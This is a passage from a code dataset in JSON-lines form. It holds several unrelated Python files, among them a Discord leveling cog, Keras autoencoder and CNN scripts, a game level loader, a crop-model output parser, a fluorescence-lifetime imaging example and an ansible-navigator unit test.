person[\"xp\"] > 1000:\r\n person[\"level\"] = person[\"level\"]+1\r\n person[\"xp\"] = 0\r\n embed=discord.Embed(title=f\"**Level Up!**\", description=f'''Congrats {message.author}, you reached level {person[\"level\"]}!''', color=0x00e4f5)\r\n await message.channel.send(embed=embed)\r\n save(people, \"members.json\")\r\n else:\r\n people[name] = {\"name\" : message.author.name, \"tag\" : message.author.discriminator, \"xp\" : 1, \"level\" : 1}\r\n save(people, \"members.json\")\r\n\r\ndef setup(bot):\r\n bot.add_cog(leveling(bot))","sub_path":"bot/cogs/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"488937348","text":"import numpy as np\n\nfrom keras.layers import Input, Dense, Lambda, Layer\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras import metrics\n\ndef variational_autoencoder(encoding_layer_dim, intermediate_dim1, intermediate_dim2, input_shape, X, X_test):\n x = Input(shape=(input_shape,))\n h1 = Dense(intermediate_dim2, activation='relu')(x)\n h2 = Dense(intermediate_dim1, activation='relu')(h1)\n z_mean = Dense(encoding_layer_dim, activation='relu')(h2)\n z_log_var = Dense(encoding_layer_dim, activation='relu')(h2)\n \n def sampling(args):\n z_mean, z_log_var = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], encoding_layer_dim), mean=0.,\n stddev=1.)\n return 
z_mean + K.exp(z_log_var / 2) * epsilon\n \n # note that \"output_shape\" isn't necessary with the TensorFlow backend\n z = Lambda(sampling, output_shape=(encoding_layer_dim,))([z_mean, z_log_var])\n \n # we instantiate these layers separately so as to reuse them later\n decoder_h1 = Dense(intermediate_dim1, activation='relu')\n decoder_h2 = Dense(intermediate_dim2, activation='relu')\n decoder_mean = Dense(input_shape, activation='sigmoid')\n h_decoded1 = decoder_h1(z)\n h_decoded2 = decoder_h2(h_decoded1) \n x_decoded_mean = decoder_mean(h_decoded2)\n \n # Custom loss layer\n class CustomVariationalLayer(Layer):\n def __init__(self, **kwargs):\n self.is_placeholder = True\n super(CustomVariationalLayer, self).__init__(**kwargs)\n \n def vae_loss(self, x, x_decoded_mean):\n xent_loss = input_shape * metrics.binary_crossentropy(x, x_decoded_mean)\n kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n return K.mean(xent_loss + kl_loss)\n \n def call(self, inputs):\n x = inputs[0]\n x_decoded_mean = inputs[1]\n loss = self.vae_loss(x, x_decoded_mean)\n self.add_loss(loss, inputs=inputs)\n # We won't actually use the output.\n return x\n \n y = CustomVariationalLayer()([x, x_decoded_mean])\n vae = Model(x, y)\n vae.compile(optimizer='rmsprop', loss=None, metrics=['accuracy'])\n \n vae.fit(X, X, \n batch_size=32, \n epochs=400,\n shuffle=True,\n validation_data=(X_test, None))\n \n # build a model to project inputs on the latent space\n encoder = Model(x, z_mean)\n\n return vae, encoder\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nsc = StandardScaler()\n\nusers = [1,2,3,4,5,6]\nactivities = [\"Jogging\", \"Running\", \"Walking down-stairs\", \"Walking up-stairs\", \"Walking\"]\nfeatures = [\"featuresOrig\", \"featuresFilt\"]\n\nfor feature in features:\n\n for act in activities:\n \n for us in users:\n totalData = pd.read_csv('../../../myTrainingData/' + feature + '_' + act + '#' + str(us) + '.csv');\n totalData.drop([\"user\"], axis=1, inplace=True)\n totalData = sc.fit_transform(np.asarray(totalData, dtype= np.float32));\n \n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+WAVELET/TIME+FFT DATA\n# =============================================================================\n statisticalWaveData = np.concatenate((totalData[:,0:12], totalData[:,18:27], totalData[:, 36:57]), axis=1)\n TimeFFTData = np.concatenate((totalData[:,27:36], totalData[:, 12:18]), axis=1)\n \n x_train_stat_wave, x_test_stat_wave = train_test_split(statisticalWaveData, test_size=0.2)\n x_train_time_fft, x_test_time_fft = train_test_split(TimeFFTData, test_size=0.2)\n \n autoencoder_stat_wave, encoder_stat_wave = variational_autoencoder(15, 25, 35, 42, x_train_stat_wave, x_test_stat_wave);\n \n autoencoder_time_fft, encoder_time_fft = variational_autoencoder(5, 8, 12, 15, x_train_time_fft, x_test_time_fft);\n \n encoded_stats_wave = encoder_stat_wave.predict(statisticalWaveData)\n encoded_time_fft = encoder_time_fft.predict(TimeFFTData)\n \n concat_encoded = np.concatenate((encoded_stats_wave, encoded_time_fft), axis=1)\n \n x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n \n autoencoder_fused, encoder_fused = variational_autoencoder(7, 11, 16, 20, x_train_fused, x_test_fused);\n \n encoded_fused = encoder_fused.predict(concat_encoded)\n\n np.savetxt(\"./resultsFusedVariational3AEStatWavelet/AEResult_\" + feature 
+ \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')\n \n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+TIME/FFT+WAVELET DATA \n# =============================================================================\n# \n# statisticalTimeData = np.concatenate((totalData[:,0:12], totalData[:,18:36]), axis=1)\n# fftWaveletData = np.concatenate((totalData[:, 12:18], totalData[:, 36:57]), axis=1)\n# \n# x_train_stat_time, x_test_stat_time = train_test_split(statisticalTimeData, test_size=0.2)\n# x_train_fft_wavelet, x_test_fft_wavelet = train_test_split(fftWaveletData, test_size=0.2)\n# \n# autoencoder_stat_time, encoder_stat_time = variational_autoencoder(10, 16, 24, 30,x_train_stat_time, x_test_stat_time);\n# autoencoder_fft_wavelet, encoder_fft_wavelet = variational_autoencoder(10, 15, 21, 27, x_train_fft_wavelet, x_test_fft_wavelet);\n# \n# encoded_stats_wave = encoder_stat_time.predict(statisticalTimeData)\n# encoded_fft_wavelet = encoder_fft_wavelet.predict(fftWaveletData)\n# \n# concat_encoded = np.concatenate((encoded_stats_wave, encoded_fft_wavelet), axis=1)\n# \n# x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n# \n# autoencoder_fused, encoder_fused = variational_autoencoder(7, 12, 16, 20, x_train_fused, x_test_fused);\n# encoded_fused = encoder_fused.predict(concat_encoded)\n#\n# np.savetxt(\"./resultsFusedVariational3AEStatTime/AEResult_\" + feature + \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')\n\n\n# =============================================================================\n# UNCOMMENT FOR STATISTICAL+FFT/TIME+WAVELET DATA \n# =============================================================================\n \n# statisticalFFTData = totalData[:,0:27]\n# TimeWaveletData = totalData[:,27:57]\n# \n# x_train_stat_fft, x_test_stat_fft = train_test_split(statisticalFFTData, test_size=0.2)\n# x_train_time_wavelet, x_test_time_wavelet = train_test_split(TimeWaveletData, test_size=0.2)\n# \n# autoencoder_stat_fft, encoder_stat_fft = variational_autoencoder(10, 15, 21, 27, x_train_stat_fft, x_test_stat_fft);\n# autoencoder_time_wavelet, encoder_time_wavelet = variational_autoencoder(10, 16, 24, 30, x_train_time_wavelet, x_test_time_wavelet);\n# \n# encoded_stats_fft = encoder_stat_fft.predict(statisticalFFTData)\n# encoded_time_wavelet = encoder_time_wavelet.predict(TimeWaveletData)\n# \n# concat_encoded = np.concatenate((encoded_stats_fft, encoded_time_wavelet), axis=1)\n# \n# x_train_fused, x_test_fused = train_test_split(concat_encoded, test_size=0.2)\n# \n# autoencoder_fused, encoder_fused = variational_autoencoder(7, 12, 16, 20, x_train_fused, x_test_fused);\n# encoded_fused = encoder_fused.predict(concat_encoded)\n#\n# np.savetxt(\"./resultsFusedVariational3AEStatFFT/AEResult_\" + feature + \"_\" + act + '#' + str(us) +\".csv\", encoded_fused, delimiter=',')","sub_path":"AEtypes/variational autoencoder/DeepVariational/fusedVariationalDeep3AEs.py","file_name":"fusedVariationalDeep3AEs.py","file_ext":"py","file_size_in_byte":8137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"188202353","text":"import json\n\nfrom common.util import load_file_as_string\n\n\nclass TileInfo:\n def __init__(self, name: str, id_: int, color: tuple):\n super().__init__()\n self.name = name\n self.id = id_\n self.color = color\n\n def __str__(self, *args, **kwargs):\n return str({\n \"name\": self.name,\n \"id\": self.id,\n 
\"color\": self.color\n })\n\n\nclass Level:\n def __init__(self):\n super().__init__()\n self.meta = {}\n self.tiles = []\n self.info = []\n self.width = 0\n self.height = 0\n\n def load_from_file(self, filename: str):\n contents = load_file_as_string(filename)\n level = json.loads(contents)\n\n # Tiles\n tiles = []\n for e in level[\"tiles\"][\"data\"]:\n tiles.extend(e)\n\n # TileInfo\n info = []\n for e in level[\"tiles\"][\"info\"]:\n info.append(TileInfo(e[\"name\"], e[\"id\"], tuple(e[\"color\"])))\n info[:] = sorted(info, key=lambda e: e.id)\n\n # Width & Height\n height = int(len(level[\"tiles\"][\"data\"]))\n width = int(len(tiles) / height)\n\n if len(tiles) % width:\n raise ValueError(\"Level is not rectangular\")\n\n meta = {}\n for k, v in level[\"meta\"].items():\n if k == \"player_color\":\n meta[k] = (v[0], v[1], v[2])\n if k == \"player_start\":\n meta[k] = (v[0], v[1])\n\n self.meta = level[\"meta\"]\n self.tiles = tiles\n self.info = info\n self.width = width\n self.height = height\n\n def in_bounds(self, x: int, y: int):\n return 0 <= int(x) < int(self.width) and 0 <= int(y) < int(self.height)\n\n def get_tile(self, x: int, y: int, default: TileInfo = None):\n if self.in_bounds(x, y):\n index = int(self.width) * int(y) + int(x)\n tile = self.tiles[index]\n return self.get_tile_by_id(tile)\n else:\n return default\n\n def set_tile_id(self, x: int, y: int, value: int):\n index = int(self.width) * int(y) + int(x)\n\n if 0 <= index < len(self.tiles):\n self.tiles[index] = int(value)\n\n def get_tile_by_id(self, id_: int):\n if 0 <= id_ < len(self.info):\n return self.info[id_]\n\n raise ValueError(\"No tile matches id %s\", id_)\n\n def get_tile_by_name(self, name: str):\n for e in self.info:\n if e.name == name:\n return e\n\n raise ValueError(\"No tile matches name %s\", name)\n\n def get_meta(self, key: str, default):\n value = self.meta.get(key)\n\n if value:\n return value\n else:\n return default\n\n def __str__(self, *args, **kwargs):\n return str({\n \"width\": str(self.width),\n \"height\": str(self.height),\n \"tiles\": str(self.tiles)\n })\n","sub_path":"app/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320478880","text":"#!/usr/bin/env python3\n\n#scen_interest = ['C_CT_RYE_NF','C_RT_RYE_NPS']\n# data = open(\"CT_NCC_NF_30RH.csv\")\n\n#### Potential Antares / EFC CSV files (ald_fname)\n# 'CT_NCC_NF_00RH'#,'NT_RYE_NPS_30RH'\n #,'CT_NCC_NF_30RH','CT_NCC_NF_45RH','CT_NCC_NF_70RH'\n #,'RT_NCC_NF_00RH','RT_NCC_NF_30RH','RT_NCC_NF_45RH','RT_NCC_NF_70RH'\n #,'NT_NCC_NF_00RH','NT_NCC_NF_30RH','NT_NCC_NF_45RH','NT_NCC_NF_70RH'\n #,'CT_NCC_NPS_00RH','CT_NCC_NPS_30RH','CT_NCC_NPS_45RH','CT_NCC_NPS_70RH'\n #,'RT_NCC_NPS_00RH','RT_NCC_NPS_30RH','RT_NCC_NPS_45RH','RT_NCC_NPS_70RH'\n #,'NT_NCC_NPS_00RH','NT_NCC_NPS_30RH','NT_NCC_NPS_45RH','NT_NCC_NPS_70RH'\n #,'CT_RYE_NF_00RH','CT_RYE_NF_30RH','CT_RYE_NF_45RH','CT_RYE_NF_70RH'\n #,'RT_RYE_NF_00RH','RT_RYE_NF_30RH','RT_RYE_NF_45RH','RT_RYE_NF_70RH'\n #,'NT_RYE_NF_00RH','NT_RYE_NF_30RH','NT_RYE_NF_45RH','NT_RYE_NF_70RH'\n #,'CT_RYE_NPS_00RH','CT_RYE_NPS_30RH','CT_RYE_NPS_45RH','CT_RYE_NPS_70RH'\n #,'RT_RYE_NPS_00RH','RT_RYE_NPS_30RH','RT_RYE_NPS_45RH','RT_RYE_NPS_70RH'\n #,'NT_RYE_NPS_00RH','NT_RYE_NPS_30RH','NT_RYE_NPS_45RH','NT_RYE_NPS_70RH'\n\n#ald_fname = 'PSU_CT_00RH_NCC_NF.csv' # This will create a reference scenario\nald_fname = 'PSU_CT_00RH_NCC_NF.csv'\ndata = open(ald_fname)\nwfile_name = 
ald_fname[0:-4]+'_cycles.csv'\n\nald_fname = ald_fname.split('_')\nscen = ald_fname[1]+'_'+ald_fname[3]+'_'+ald_fname[4]+'_'+ald_fname[2]\nald_fname = '_'.join(ald_fname)\n\n# create multimode files\nr_type =['C','CS','CCS','S',]\nlenRot =[1,1,2,1]\n\nfirstrun = True\nC = []\nM = []\nS = []\nL = []\nP = []\nA = []\nW = []\nWC= []\nON= []\nTP= []\nB = []\ncrop=[]\nnOut = []\nyOut = []\ndelta_C = []\n\nSOC = [] # delta soil organic carbon\nNO3 = [] # nitrate leached\nVol = [] # volatilized\nN2O = [] # N2O denitrification\n\n#Use -1 to force a crash if index not found\ncc = -1 # cycles id\nmc = -1 # cafo id\nsc = -1 # soil id\nlc = -1 # landuse id\nanc= -1 # animal id\nac = -1 # ammonium id\nonc= -1 # organic nitrogen id\ntpc= -1 # total phosphorus id\nwc = -1 # nldas weather file\nwcc= -1 # nldas code id\nrlen = -1 # rotation length\n\nfor row in data:\n row_copy = row\n row = row.split(',')\n\n if firstrun:\n #print(First!)\n firstrun = False\n for i in range(len(row)):\n #print(Saving vectors)\n if row[i] == 'cluid':\n cc = i\n elif row[i] == 'gnatsgo_ma':\n sc = i\n elif row[i] == 'EFC_ROTATE':\n lc = i\n elif row[i] == 'NLDAS':\n wc = i\n elif row[i] == 'NLDAS_CODE':\n wcc = i\n elif row[i] == 'cafo_major':\n mc = i\n elif row[i] == '_NH3ADJ':\n ac = i\n elif row[i] == '_ONADJ':\n onc = i\n elif row[i] == '_ANIMAAL':\n anc = i\n elif row[i] == '_PADJ':\n tpc = i\n\n else:\n try:\n L.append(row[lc])\n S.append(row[sc])\n C.append(row[cc])\n A.append(float(row[ac]))\n M.append(float(row[mc]))\n B.append(row[anc])\n ON.append(float(row[onc]))\n TP.append(float(row[tpc]))\n W.append(row[wc].strip())\n WC.append(row[wcc].strip())\n except ValueError:\n print(row_copy)\n quit()\n\ndata.close()\nnrow=len(C)\n\nfor i in range(nrow):\n SOC = [] # delta soil organic carbon\n NO3 = [] # nitrate leached\n Vol = [] # volatilized\n N2O = [] # N2O denitrification\n crp = [] # yield\n\n if L[i]== \"CG|CG|CG|CG\":\n crop.append('C')\n rlen = 1\n P.append('1')\n elif L[i] == \"SB|SB|SB|SB\":\n crop.append('S')\n rlen = 1\n P.append('1')\n elif L[i] == \"CG|SB|CG|SB\" or L[i] == \"SB|CG|SB|CG\":\n crop.append('CS')\n rlen = 2\n if L[i] == \"SB|CG|SB|CG\":\n P.append('1')\n else:\n P.append('2')\n elif L[i] == \"SB|CG|CG|SB\" or L[i] == \"CG|CG|SB|CG\" or L[i] == \"CG|SB|CG|CG\" or L[i] == \"SB|CG|CG|CG\":\n crop.append('CCS')\n rlen = 3\n\n if L[i][0:2] == 'SB':\n P.append('1')\n elif L[i][3:5] == 'SB':\n P.append('2')\n elif L[i][6:8] == 'SB':\n P.append('3')\n else: P.append('4')\n else:\n crop.append('CS')\n rlen = 2\n if L[i][0:2] == 'SB':\n P.append('1')\n else: P.append('2')\n\n ctrl_file = 'W'+WC[i]+'_'+crop[i]+P[i]+'_'+S[i]+'_'+scen\n n_path = 'output/'+ctrl_file+'/annualN.dat'\n y_path = 'output/'+ctrl_file+'/season.dat'\n s_path = 'output/'+ctrl_file+'/summary.dat'\n try:\n #print(n_path)\n cycOut = open(n_path)\n nums = []\n for rownum, row in enumerate(cycOut):\n if rownum > 1 and float(row[0:4])>= 2013:\n #print(C[i])\n nums_str = row.split()\n nums = [float(n.strip()) for n in nums_str]\n NO3.append(round(nums[4]+nums[6],3))\n N2O.append(round(nums[11],3))\n Vol.append(round(nums[10],3))\n cycOut.close()\n nOut.append(','+str(NO3)[1:-1]+','+str(N2O)[1:-1]+','+str(Vol)[1:-1])\n\n cycOut = open(y_path)\n crpOld = ''\n yldOld = ''\n yrOld = ''\n Yld = [] # Annual yield\n Crp = [] # Crops harvested each year\n for rownum, row in enumerate(cycOut):\n if rownum > 1 and float(row[0:4])>= 2013:\n row = row.split()\n\n # Harvest may be grain or forage\n if float(row[5]) > 0:\n yld = 
round(float(row[5]),3)\n else: yld = round(float(row[6]),3)\n\n crp = row[1][0:3]\n # There may be multiple harvests in 1 year\n # If this is not the first harvest of the year:\n if yrOld == row[0][0:4]:\n yld = str(yldOld)+'|'+str(yld)\n crp = crpOld+'|'+crp\n\n # if the last crop isn't the same as this year, AND it's not the first year:\n elif yldOld !='':\n Yld.append(yldOld)\n Crp.append(crpOld)\n\n #elif yldOld !='':\n #pass\n\n #else:\n #Yld.append(yld)\n #Crp.append(crp)\n\n yrOld = row[0][0:4]\n crpOld= crp\n yldOld= yld\n\n # Take care of the last row of data\n Yld.append(yld)\n Crp.append(crp)\n\n cycOut.close()\n yOut.append(','+str(Crp)[1:-1]+','+str(Yld)[1:-1]+',')\n cycOut = open(s_path)\n for rownum,row in enumerate(cycOut):\n if rownum == 2:\n row = row.split()\n # change in soil C over the simulation\n # for default scenario, 1980-2016\n # for alternative scenarios, 2013-2016\n delta_C.append(round(float(row[2]),3))\n cycOut.close()\n\n except FileNotFoundError:\n nOut.append(',NA,NA,NA,NA,NA,NA,NA,NA,NA,NA,NA,NA')\n yOut.append(',NA,NA,NA,NA,NA,NA,NA,NA,')\n delta_C.append('NA')\ndata.close()\n\nfrstrun=True\nnewdata=''\nupdated = ''\nadd0n=' '\nwfile = open(ald_fname)\nfor j,row in enumerate(wfile):\n row = [r.strip() for r in row.split(',')]\n i = j-1\n if frstrun:\n frstrun=False\n updated = \",\".join(row)+str(',NO3_13, NO3_14, NO3_15, NO3_16, N2O_13, N2O_14, N2O_15, N2O_16, Vol_13, Vol_14, Vol_15, Vol_16 \\\n, Crops13, Crops14, Crops15, Crops16, Yield13, Yield14, Yield15, Yield16, soilC_delta \\n')\n else:\n updated = \",\".join(row)+nOut[i]+yOut[i]+str(delta_C[i])+str('\\n')\n\n newdata+=updated\nwfile.close()\ndata2 = open(wfile_name,\"w\")\ndata2.write(newdata)\ndata2.close()\n#########################################################################################\n","sub_path":"scenOutput.py","file_name":"scenOutput.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276922187","text":"\"\"\"\n====================\nMean lifetime images\n====================\nCompute the mean lifetime in a pixel using the method of moments\n(Irvin Isenberg, 1973, Biophysical journal).\n\"\"\"\nimport tttrlib\nimport numpy as np\nimport pylab as plt\n\nfilename = '../../tttr-data/imaging/zeiss/eGFP_bad_background/eGFP_bad_background.ptu'\nfilename_irf = '../../tttr-data/imaging/zeiss/eGFP_bad_background/IRF.ptu'\n\ndata = tttrlib.TTTR(filename)\nirf = tttrlib.TTTR(filename_irf)\n\nchannels_green = [0, 2]\nchannels_red = [1, 3]\n\n# Assume constant background (same shape as IRF)\ndata_irf = irf[irf.get_selection_by_channel(channels_red)]\nplt.xlim(0, 5000)\nirf_np, x = data_irf.get_microtime_histogram(1)\nbackground = np.ones_like(irf_np)\nplt.semilogy(background)\n\n#%%\n# Create a new CLSM Image. This image will be used as a template for the green and red image.\n# This avoids passing through the TTTR screen multiple times. 
The frame line, and pixel locations\n# will be copied for the green and red image from this template.\nclsm_template = tttrlib.CLSMImage(data)\nclsm_green = tttrlib.CLSMImage(\n source=clsm_template,\n channels=channels_green\n)\nclsm_red = tttrlib.CLSMImage(\n source=clsm_template,\n channels=channels_red\n)\n\nmean_tau_green = clsm_green.get_mean_lifetime(\n tttr_irf=irf[irf.get_selection_by_channel(channels_green)],\n tttr_data=data,\n minimum_number_of_photons=5,\n background=background,\n background_fraction=0.02,\n stack_frames=True\n)\n\ngreen = clsm_green.intensity.sum(axis=0)\nred = clsm_red.intensity.sum(axis=0)\n\nmask = (green < 20) + (red < 20)\nmasked_green = np.ma.masked_where(mask, green)\nmasked_red = np.ma.masked_where(mask, red)\nmasked_tau = np.ma.masked_where(mask, mean_tau_green.mean(axis=0))\nlg_sg_sr = np.log(masked_green / masked_red)\n\nfig, ax = plt.subplots(nrows=2, ncols=2)\nax[0, 0].set_title('Green intensity')\nax[0, 1].set_title('Red intensity')\nax[1, 0].set_title('Mean green fl. lifetime')\nax[1, 1].set_title('Pixel histogram')\nax[1, 1].set_xlabel('tauG / ns')\nax[1, 1].set_ylabel('log(Sg/Sr')\nax[0, 0].imshow(green, cmap='cividis')\nax[0, 1].imshow(red, cmap='inferno')\nax[1, 0].imshow(mean_tau_green.mean(axis=0), cmap='Spectral')\nax[1, 1].hist2d(\n x=masked_tau.flatten(),\n y=lg_sg_sr.flatten(),\n range=((0.001, 10), (-2, 0.9)),\n bins=41\n)\nplt.show()\n","sub_path":"examples/flim/plot_lifetime_moments_bg.py","file_name":"plot_lifetime_moments_bg.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"257025892","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nimport numpy as np\nimport glob\nimport pandas as pd\n\n#-------------------------------------------------------------------\n# Directory and image size definition, epoch number and sample size.\n#-------------------------------------------------------------------\n\nimg_width, img_height = 150, 150\ntestdir = './reimager/test/'\ntrain_data_dir = './reimager/train/'\nnb_train_samples = 8000\nnb_epoch = 50\n\n#-------------------------------------------------------------\n# Model Layer I. -- Input shape is defined - 3 layers (R,G,B).\n#-------------------------------------------------------------\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(32, 2, 2, batch_input_shape = (30, 3, 150, 150)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#-------------------------------\n# Model Layer II. -- Convolution\n#-------------------------------\n\nmodel.add(Convolution2D(32, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#-------------------------------\n# Model Layer III. -- Convolution \n#-------------------------------\n\nmodel.add(Convolution2D(64, 3, 3))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size = (2, 2)))\n\n#------------------------------------------\n# Model Layer IV. -- Flattened simple layer\n#------------------------------------------\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\n\n\n#-------------------------------------------\n# Model Layer V. 
-- There are 4 classes.\n#-------------------------------------------\n\nmodel.add(Dropout(0.5))\nmodel.add(Dense(4))\nmodel.add(Activation('softmax'))\n\n\n#---------------------\n# Optimization set up.\n#---------------------\n\nmodel.compile(loss = 'categorical_crossentropy',\n optimizer = 'rmsprop',\n metrics = ['accuracy'])\n\n\n#------------------------------------------------------------------\n# Train data streamer - shear transformation, zooming and flipping.\n#------------------------------------------------------------------\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True)\n\n#---------------------\n# Test data generator.\n#---------------------\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\n#---------------------\n# Train data streamer.\n#---------------------\n\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size = (img_width, img_height),\n batch_size = 30,\n classes = [\"1\", \"2\", \"3\", \"4\"],\n class_mode = \"categorical\")\n\n#-----------------------\n# Model fit initializer.\n#-----------------------\n\nmodel.fit_generator(train_generator,\n samples_per_epoch = nb_train_samples,\n nb_epoch = nb_epoch)\n\n#-----------------\n# Test normalizer.\n#-----------------\n\ntest_real_datagen = ImageDataGenerator(rescale = 1./255)\n\n#--------------------\n# Test data streamer.\n#--------------------\n\ngenerator = test_real_datagen.flow_from_directory(testdir,\n target_size = (150, 150),\n class_mode = None,\n batch_size = 1, \n shuffle = False)\n \n#-------------\n# Predictions.\n#-------------\n\nfiles_to_transform = glob.glob(\"./reimager/test/*.jpg\")\n\nout_list = []\nfor f in files_to_transform:\n image = load_img(f)\n image = img_to_array(image)\n image = np.divide(image, 255)\n image = image.reshape((1,) + image.shape)\n y_hat = model.predict_classes(image, verbose = 1)[0]\n name = f.split(\"./reimager/test/\")[1].split(\".jpg\")[0]\n row_content = [name, y_hat]\n out_list = out_list + [row_content]\n \ndf = pd.DataFrame(out_list) \n\ndf.to_csv(path_or_buf = \"prediction_neuro_classes.csv\", sep = \";\", index = False)\n","sub_path":"CNN_Cross_Validation_Streamer.py","file_name":"CNN_Cross_Validation_Streamer.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"13537566","text":"import os\nimport yaml\n \nclass ModanConf: \n def __init__(self):\n file_path1 = os.path.join('..','config','modan.yaml')\n file_path2 = os.path.join('.','config','modan.yaml')\n file_path = ''\n if( os.access(file_path1, os.F_OK) ): file_path = file_path1\n elif( os.access(file_path2, os.F_OK) ): file_path = file_path2\n #print file_path\n self.item = {}\n\n try:\n with open(file_path, 'r') as f:\n self.item = yaml.safe_load(f)\n except Exception:\n print( \"Error opening yaml file under config\")\n","sub_path":"libpy/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"141452573","text":"\"\"\"Some simple tests to confirm the artifact path is correctly set\n\"\"\"\nimport logging\nimport os\n\nfrom copy import deepcopy\nfrom typing import NamedTuple\nfrom typing import Union\nfrom unittest.mock import patch\nfrom unittest.mock import mock_open\n\nimport pytest\n\nfrom ansible_navigator.configuration_subsystem import NavigatorConfiguration\nfrom 
ansible_navigator.actions.run import Action as action\n\n\nclass TstData(NamedTuple):\n \"\"\"the test data object\"\"\"\n\n name: str\n filename: Union[None, str]\n playbook: str\n expected: str\n\n\ndef id_from_data(value):\n \"\"\"return the name from the test data object\"\"\"\n return f\" {value.name} \"\n\n\ntest_data = [\n TstData(\"Filename absolute\", \"/tmp/artifact.json\", \"site.yml\", \"/tmp/artifact.json\"),\n TstData(\n \"Filename with .\", \"./artifact.json\", \"site.yml\", f\"{os.path.abspath('.')}/artifact.json\"\n ),\n TstData(\n \"Filename with ..\", \"../artifact.json\", \"site.yml\", f\"{os.path.abspath('..')}/artifact.json\"\n ),\n TstData(\n \"Filename with ~\", \"~/artifact.json\", \"/tmp/site.yaml\", \"/home/test_user/artifact.json\"\n ),\n TstData(\"Playbook absolute\", None, \"/tmp/site.yaml\", \"/tmp/site-artifact\"),\n TstData(\"Playbook with .\", None, \"./site.yaml\", f\"{os.path.abspath('.')}/site-artifact\"),\n TstData(\"Playbook with ..\", None, \"../site.yaml\", f\"{os.path.abspath('..')}/site-artifact\"),\n TstData(\"Playbook with ~\", None, \"~/site.yaml\", \"/home/test_user/site-artifact\"),\n]\n\n\n@patch.dict(\"os.environ\", {\"HOME\": \"/home/test_user\"})\n@patch(\"os.makedirs\", return_value=True)\n@patch(\"builtins.open\", new_callable=mock_open)\n@patch(\"ansible_navigator.actions.run.Action._get_status\", return_value=(0, 0))\n@pytest.mark.parametrize(\"data\", test_data, ids=id_from_data)\ndef test_artifact_path(_mocked_get_status, mocked_open, _mocked_makedirs, caplog, data):\n \"\"\"Test the building of the artifact filename given a filename or playbook\"\"\"\n caplog.set_level(logging.DEBUG)\n\n args = deepcopy(NavigatorConfiguration)\n args.entry(\"playbook\").value.current = data.playbook\n args.post_processor.playbook(entry=args.entry(\"playbook\"), config=args)\n playbook_artifact_save_as = args.entry(\"playbook_artifact_save_as\")\n if data.filename:\n args.entry(\"playbook_artifact_save_as\").value.current = data.filename\n else:\n args.entry(\n \"playbook_artifact_save_as\"\n ).value.current = playbook_artifact_save_as.value.default\n args.entry(\"playbook_artifact_enable\").value.current = True\n\n run = action(args=args)\n run.write_artifact(filename=data.filename)\n\n open_filename = mocked_open.call_args[0][0]\n assert open_filename.startswith(data.expected), caplog.text\n","sub_path":"tests/unit/test_playbook_artifact_path.py","file_name":"test_playbook_artifact_path.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"353444563","text":"import csv\nimport cv2\nimport math\nimport numpy as np\n\n\ndef read_samples_from_csv(data_dir, samples):\n csv_file = data_dir + '/driving_log.csv' \n with open(csv_file) as csvfile:\n reader = csv.reader(csvfile)\n for sample in reader:\n for i in range(0,3):\n sample[i] = data_dir + '/IMG/' + sample[i].strip().split('/')[-1]\n samples.append(sample)\n\nfrom sklearn.utils import shuffle\nimport os.path\nimport random\nHIGHER_ANGLE_THRESHOLD = 0.25\nHIGHER_ANGLE_PROBABILITY = 0.5\n\"\"\"\nReturn (image_path, angle) with sub-sampling.\n\"\"\"\ndef get_one_sample(sample):\n should_get_higher_angle = random.uniform(0, 1) <= HIGHER_ANGLE_PROBABILITY\n for i in range(0, 3):\n steering_bias = 0.0\n if i == 1:\n steering_bias = 0.25\n elif i == 2:\n steering_bias = -0.25\n\n image_path = sample[i]\n angle = steering_bias + float(sample[3])\n if should_get_higher_angle and abs(angle) < 
